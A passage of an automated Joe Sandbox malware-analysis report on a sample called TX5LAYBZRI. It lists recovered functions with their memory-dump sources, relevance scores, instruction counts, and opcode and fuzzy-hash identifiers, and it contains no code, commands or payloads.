                                            • API String ID: 3577187118-0
                                            • Opcode ID: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                            • Instruction ID: 83e04ead97ecfab842b32efa3409d0dda0cbd0588d593ef691927f796129b38d
                                            • Opcode Fuzzy Hash: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                            • Instruction Fuzzy Hash: E9C080F111D201BFC70C8714D855B2F77D8DB44355F13581CB046C1190EA345990CF1B
                                            Function 07920A75 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ZXP
                                            • API String ID: 0-2878008129
                                            • Opcode ID: 3254acbb7fab6560dc10e1fe2c7f49f977c8e012a46edb01f61b943b158999e5
                                            • Instruction ID: 7a2ce7aaf563ec62842412d9e15b4970f7249b7bf5ae50c756251b66c7aa13ea
                                            • Opcode Fuzzy Hash: 3254acbb7fab6560dc10e1fe2c7f49f977c8e012a46edb01f61b943b158999e5
                                            • Instruction Fuzzy Hash: C1418EEB12D175BC7651E58A2B14AFBA76DE1C7778B308827F807D540AE2C40E4F2132
                                            Function 07920A0C Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ZXP
                                            • API String ID: 0-2878008129
                                            • Opcode ID: 351653bc3b329b2f62834bcd02c9460fecab7f2d5782598291e5f0e6afb9b0c7
                                            • Instruction ID: f4b0c42e9bdffad37bf0e8277891a595d21689c1d34788a6a085b28f7f777a4a
                                            • Opcode Fuzzy Hash: 351653bc3b329b2f62834bcd02c9460fecab7f2d5782598291e5f0e6afb9b0c7
                                            • Instruction Fuzzy Hash: B0419FEB12D134BCB651E18A2B14AFBA76ED1C7778B308827F807D510AD2D80E4F6132
                                            Function 00B931D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 71f3587028c2138a4e931197f7384bd4a6548196459e5a4ff6bbb4f534adf2c8
                                            • Instruction ID: 9596a427673ed9afe7ad73d2d077fe187c2452fd9f7be0e0d6fbab24c684847b
                                            • Opcode Fuzzy Hash: 71f3587028c2138a4e931197f7384bd4a6548196459e5a4ff6bbb4f534adf2c8
                                            • Instruction Fuzzy Hash: B83197B49053059FCB00EFB8CA8569EBBF4AF44744F008869E894E7340E734DA44DF52
                                            Function 0792060E Relevance: .6, Instructions: 581COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51d2015e73ac9e5ab5ff5a23ef881d31d8c12e6472634f209e16e5d5991003e2
                                            • Instruction ID: f74c496299e64f5ab06fee538660c30a11eec5affdc5a682382d778209b21a2d
                                            • Opcode Fuzzy Hash: 51d2015e73ac9e5ab5ff5a23ef881d31d8c12e6472634f209e16e5d5991003e2
                                            • Instruction Fuzzy Hash: 51B149FB529125BDB651E18A6B18BFB676DE2C7738F308827F803D150AD2D80A4F6131
                                            Function 0792067C Relevance: .6, Instructions: 551COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a2253c5c7ceb05dd47922a775991d8fff11cebcd268e9c5315390c4035835180
                                            • Instruction ID: 3158bca9f5633e0e4dccfa3fdc4ce3abbdb577729a5f8308115df9f8dec50fe3
                                            • Opcode Fuzzy Hash: a2253c5c7ceb05dd47922a775991d8fff11cebcd268e9c5315390c4035835180
                                            • Instruction Fuzzy Hash: 35B17AEB52D125BDB651E1896F18AFB676DE2C7738F308827F803D150AD2D90A4F6132
                                            Function 07920642 Relevance: .5, Instructions: 544COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 658592587f22b4c405a5c8801a3f01406e2d47b89f23ab9cca283d93513bc446
                                            • Instruction ID: fc77c07ccd463cfac203fd3fe932443fc020d660ebbda2a162139422b7699f2a
                                            • Opcode Fuzzy Hash: 658592587f22b4c405a5c8801a3f01406e2d47b89f23ab9cca283d93513bc446
                                            • Instruction Fuzzy Hash: 51B148EB52D125BDB611E58A6B14BFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Function 0792065E Relevance: .5, Instructions: 536COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dceddd496d8025665e30a201ca2390a860b106f11eddc664ce2b9b70d018d2c
                                            • Instruction ID: a5541bff12cf6db47d4b05ff53c07d5e4a751b3a5e9b988e809e9f875652b1f2
                                            • Opcode Fuzzy Hash: 1dceddd496d8025665e30a201ca2390a860b106f11eddc664ce2b9b70d018d2c
                                            • Instruction Fuzzy Hash: 44A149EB52D125BDB651E18A6B18BFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Function 079206DC Relevance: .5, Instructions: 521COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c3f97860e1180c33d0f4bd8090afb6a59dbfce32414220d340c8e89cc7541f7
                                            • Instruction ID: 3292a347b9d118a8176341d01c53d15eba3f493a88037db8a0068ca0c2a2df49
                                            • Opcode Fuzzy Hash: 5c3f97860e1180c33d0f4bd8090afb6a59dbfce32414220d340c8e89cc7541f7
                                            • Instruction Fuzzy Hash: 3FA148EB52D125BCB651E18A6F14AFBA76DE2C7738B30C827F803D150AD2D90A4F6131
                                            Function 079206AE Relevance: .5, Instructions: 519COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7da220fbcbc2acb52a2a3d4fe2711f75e48bb56f2c3aa4302d3c62b0eab0417
                                            • Instruction ID: 677286bbcce483b3dc97366184545f67f2dddfb066fff0cc4c4850df673e1a8f
                                            • Opcode Fuzzy Hash: a7da220fbcbc2acb52a2a3d4fe2711f75e48bb56f2c3aa4302d3c62b0eab0417
                                            • Instruction Fuzzy Hash: 4FA149EB52D125BDB651E18A6F14AFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Function 079206C8 Relevance: .5, Instructions: 518COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8db184e895f76cd601aff26058f86dc312866a914f03b77f4da2c595049e0f3
                                            • Instruction ID: 7364a4dd42f3b49a6945f5491326d1e728b5029792f26da3d726ffbc8f29f3ce
                                            • Opcode Fuzzy Hash: f8db184e895f76cd601aff26058f86dc312866a914f03b77f4da2c595049e0f3
                                            • Instruction Fuzzy Hash: 5CA138EB52D125BCB651E18A6F14AFBA76DE2C7738F308827F807D150AD2D90A4F6131
                                            Function 07920700 Relevance: .5, Instructions: 509COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 909c12ff6e9e1740b91e7244f2e657db62e646d5904a393498e51193ac7d1254
                                            • Instruction ID: c3316d7b63c7db05285748a1f24ab992b2ebf5dd6a366da628089507e8f92d12
                                            • Opcode Fuzzy Hash: 909c12ff6e9e1740b91e7244f2e657db62e646d5904a393498e51193ac7d1254
                                            • Instruction Fuzzy Hash: AEA12AEB52D125BCB651E18A6F14AFB676DE2C7738B30C827F807D150AD2D90A4F6132
                                            Function 0792074A Relevance: .5, Instructions: 504COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35dc9b56798bee9d4afac1af73c0334b1637df8f998d3788ec6bcbc595cf4633
                                            • Instruction ID: 022e4c282329d0547bad1c37c9a007be02b41f6fcb9407e8dbe94ba59880b6af
                                            • Opcode Fuzzy Hash: 35dc9b56798bee9d4afac1af73c0334b1637df8f998d3788ec6bcbc595cf4633
                                            • Instruction Fuzzy Hash: 56913BEB52D125BCB651E18A6F14AFB676DE2C7738B30C827F803D150AD2D54A4F6131
                                            Function 0792072F Relevance: .5, Instructions: 501COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0927f5217055c72fa05e44e83b4dfa616265fb404e9428b8c1a186631f83816f
                                            • Instruction ID: 364a8d90542c992a66afcfdd03ac320f154baaf54e5f7431de4814ba4bf51e56
                                            • Opcode Fuzzy Hash: 0927f5217055c72fa05e44e83b4dfa616265fb404e9428b8c1a186631f83816f
                                            • Instruction Fuzzy Hash: 399129EB52D125BCB651E18A6B14AFB676DE2C7738B30C827F807D150AE2D90A4F6131
                                            Function 07920764 Relevance: .5, Instructions: 490COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bd0d3b0fa3c157eff73b46ae0730c426051fb755b74a81569b88da0c1938f3c
                                            • Instruction ID: e69e2b9e857d510e0dfe113598097fcf02d9b641b0208501e9befa94d4a64715
                                            • Opcode Fuzzy Hash: 6bd0d3b0fa3c157eff73b46ae0730c426051fb755b74a81569b88da0c1938f3c
                                            • Instruction Fuzzy Hash: 509108EB52D125BCB651E18A6B14EFB676DE2C7738B30C827F807D150AD2D90A4F6132
                                            Function 07920773 Relevance: .5, Instructions: 486COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7966fe3e4c6e3e0b13e1a35d0d92dbe2b0f365b34bfd92c820f9315a918fe4b4
                                            • Instruction ID: a1383817d7d7da410122a76663dce6c08ebd9b55a479040dbdd824145dae5548
                                            • Opcode Fuzzy Hash: 7966fe3e4c6e3e0b13e1a35d0d92dbe2b0f365b34bfd92c820f9315a918fe4b4
                                            • Instruction Fuzzy Hash: 3E9119EB52D125BCB651E18A6B14EFB676DE2C7738B30C827F807D140AD2D90A4F6131
                                            Function 07920799 Relevance: .5, Instructions: 474COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce4eebff34784425680fa149db17a3bc17c164a7e9e35c8aa208e8154b9b0ba4
                                            • Instruction ID: f59f4186e6339c8aa0e8297f969c07da57aef76a1c4b7ab15a1e5c8ed6d03fe1
                                            • Opcode Fuzzy Hash: ce4eebff34784425680fa149db17a3bc17c164a7e9e35c8aa208e8154b9b0ba4
                                            • Instruction Fuzzy Hash: 138107EB12D125BCB551E18A6B24EFB676DE1C7738B30C827F807D150AE2D94A4F6132
                                            Function 079207BD Relevance: .5, Instructions: 460COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 472c59ad3a1d7c18140899f2969788a8d2528673491e0d4241d2bb061e61de2e
                                            • Instruction ID: a2ad72eb15d66b57334789fe8d35f1a3936c61fdc7334c3ef467ebb4dd411b21
                                            • Opcode Fuzzy Hash: 472c59ad3a1d7c18140899f2969788a8d2528673491e0d4241d2bb061e61de2e
                                            • Instruction Fuzzy Hash: 728119EB56D125BCB651E18A6F14EFBA76DE1C7738B308827F807D140AE2D50A4F6132
                                            Function 07920805 Relevance: .4, Instructions: 428COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c11f3c5f3cc22eda1d2912085596f2b8c948e252a02bb4ddee242d4221ee1a8e
                                            • Instruction ID: 67d0585c1fe32ab02187a3150aa2fc0784580584e1400294f7c248d9ff28ef85
                                            • Opcode Fuzzy Hash: c11f3c5f3cc22eda1d2912085596f2b8c948e252a02bb4ddee242d4221ee1a8e
                                            • Instruction Fuzzy Hash: 5D7139EB52D125BCB651E18A6B24EFB676DE1C7738B30C827F807D140AE2D54A4F6131
                                            Function 07920843 Relevance: .4, Instructions: 427COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46673f9f1453e3758a0ec9524ba64e3bdf496af07418b4292ae44030023b4cc5
                                            • Instruction ID: 6cbd22c9c0c5f874cc5fd545af290a50c08e686f9f0114b38b1d6b09478d36f1
                                            • Opcode Fuzzy Hash: 46673f9f1453e3758a0ec9524ba64e3bdf496af07418b4292ae44030023b4cc5
                                            • Instruction Fuzzy Hash: D07128EB16D135BCB651E18A6B14EFB676EE1C7738B308827F807D150AE2D90A4F6131
                                            Function 07920825 Relevance: .4, Instructions: 421COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7407ccf2c25a4b4a5dd8756108ee3f763ec91f5f295bada73fc4d6dfd56faedc
                                            • Instruction ID: 3fd7ca72db885056c7c84c452c55dc7823a10ec137c7d2dd7a71f362aacfd4bb
                                            • Opcode Fuzzy Hash: 7407ccf2c25a4b4a5dd8756108ee3f763ec91f5f295bada73fc4d6dfd56faedc
                                            • Instruction Fuzzy Hash: 487129EB16D125BCB651E58A6F14EFB676DE2C7738B308827F807D140AD2D50A4F6131
                                            Function 07920866 Relevance: .4, Instructions: 409COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8bcd478fc5dcb9c85ac6e3d92dae1cd526d54c26bc081978021b6f561bc8ce99
                                            • Instruction ID: 0949196bf1d9524b04d4b4955235675fcfc7cb6c3ef5e0a7bf2e71eda3863c19
                                            • Opcode Fuzzy Hash: 8bcd478fc5dcb9c85ac6e3d92dae1cd526d54c26bc081978021b6f561bc8ce99
                                            • Instruction Fuzzy Hash: 11715AEB52D125BCB651E14A2F24EFB676DE1C7738B308827F807D150AE2D90A4F6132
                                            Function 079208A2 Relevance: .4, Instructions: 397COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 389c8403ed11888ab5b31a1d1492a8a34c1feee5178eb806f98262ded58b46b1
                                            • Instruction ID: f875e884a5ebd875cdd38f500ed64e08d5a31c688b10b3b50e6f8808a4526f01
                                            • Opcode Fuzzy Hash: 389c8403ed11888ab5b31a1d1492a8a34c1feee5178eb806f98262ded58b46b1
                                            • Instruction Fuzzy Hash: 3E7117EB12D125BCB651E54A6B24EFB676DE1C7738B318827F807D250AD2D40A4F6132
                                            Function 079208B6 Relevance: .4, Instructions: 389COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f69d5cd80bc3bee6bc42ca8749c3e30b9fb0ab62d3ecd9404329deb0d2ba7ab4
                                            • Instruction ID: 931a75a5b035df604774abf536a0083ad4b4e31f539af8f081f986e3bb7b25e8
                                            • Opcode Fuzzy Hash: f69d5cd80bc3bee6bc42ca8749c3e30b9fb0ab62d3ecd9404329deb0d2ba7ab4
                                            • Instruction Fuzzy Hash: 166118EB12D125BCB651E54A6F24EFB676DE1C7738B308827F807D150AE2D44A4F6132
                                            Function 07920942 Relevance: .4, Instructions: 378COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 777c53ff4f817eeccb073a62bd627235cb17d65c34aad12c1670a19751f9877f
                                            • Instruction ID: 62d7c391280f6a5799836aa539d18ebe4b9eaf4b4d9f721c49cf9d88ce941594
                                            • Opcode Fuzzy Hash: 777c53ff4f817eeccb073a62bd627235cb17d65c34aad12c1670a19751f9877f
                                            • Instruction Fuzzy Hash: EB61F7EB22D125BC7551E18A2F24EFB676EE1C7738B318827F807D150AE2C90A4F2131
                                            Function 079208E2 Relevance: .4, Instructions: 374COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a85339cd777d8f4ebfc02839f6aea069fca030fa206c27a002fc86c32a4ad0e1
                                            • Instruction ID: 1eb825a2b5c04c4d98140734abffc66978027a27140c24faee5be2ce100c2f4a
                                            • Opcode Fuzzy Hash: a85339cd777d8f4ebfc02839f6aea069fca030fa206c27a002fc86c32a4ad0e1
                                            • Instruction Fuzzy Hash: 8361E7EB26D125BC7551E18A2B28EFB576EE1C7738B318827F807D150AE2C50A4F6131
                                            Function 079208F3 Relevance: .4, Instructions: 367COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0d0d5521e9c7c765eda87b50c0774f10f77dac8322e19bb30c8198afc948854
                                            • Instruction ID: b20943f49fba03a2bd5408530f8e31095ccc161d70a74a73762a9994b0e50411
                                            • Opcode Fuzzy Hash: f0d0d5521e9c7c765eda87b50c0774f10f77dac8322e19bb30c8198afc948854
                                            • Instruction Fuzzy Hash: F661F6EB22D125BC7551E54A6B24EFB676DE1C7738B31C827F807D140AE2D84A8F6132
                                            Function 0792090A Relevance: .4, Instructions: 364COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0490af792474d94b3a15345f3970f3d2c8b9064bd4095df147c659587f8f26fc
                                            • Instruction ID: 9df5be7d7c119fbe1696cb4407c0e4506978989c44d44ec2ad194223ed56cf07
                                            • Opcode Fuzzy Hash: 0490af792474d94b3a15345f3970f3d2c8b9064bd4095df147c659587f8f26fc
                                            • Instruction Fuzzy Hash: 4D61F6EB22D125BC7551E14A2B28EFB676DE1C7738B31C827F807D150AD2D90A8F6132
                                            Function 07920963 Relevance: .3, Instructions: 348COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3631481640b8e29ea4683dafea387f2c16173166a568fbfd7a612c4a6b547ee
                                            • Instruction ID: 1613765e8a2d1e3ae71e5d5db693e743b0d80d0e6b5c1ba23dacc16d60786228
                                            • Opcode Fuzzy Hash: f3631481640b8e29ea4683dafea387f2c16173166a568fbfd7a612c4a6b547ee
                                            • Instruction Fuzzy Hash: 675128EB22D125BC7551E14A2B28EFB676EE1C7738B31C827F807D140AD2C40A8F6132
                                            Function 07920930 Relevance: .3, Instructions: 342COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db1218e36f3c94d9fd27f0089bec3e12466db4ae68f688666d2f08067a1bc8f5
                                            • Instruction ID: 12b5b01dbda6f8319179b89b43a19a6f11033a95163d2369ffb8c80d905e2568
                                            • Opcode Fuzzy Hash: db1218e36f3c94d9fd27f0089bec3e12466db4ae68f688666d2f08067a1bc8f5
                                            • Instruction Fuzzy Hash: A451F8EB62D125BC7551E14A2B28EFB676DE1C7738B31C827F807D150AD2C94A8F6132
                                            Function 0792098C Relevance: .3, Instructions: 306COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c346221a088b4326abdeec8216acc2aed66208f48d66fdd75e66fca1dcd4bca
                                            • Instruction ID: e1481b4045b168e7a653d4622831133d41ab48b7d9b25f555f35c4529adf78d7
                                            • Opcode Fuzzy Hash: 2c346221a088b4326abdeec8216acc2aed66208f48d66fdd75e66fca1dcd4bca
                                            • Instruction Fuzzy Hash: 565106EB22D125BC7651E58A2B18EFB676DD1C7738B30C827F807D140AD2D80A8F6132
                                            Function 079209A9 Relevance: .3, Instructions: 295COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
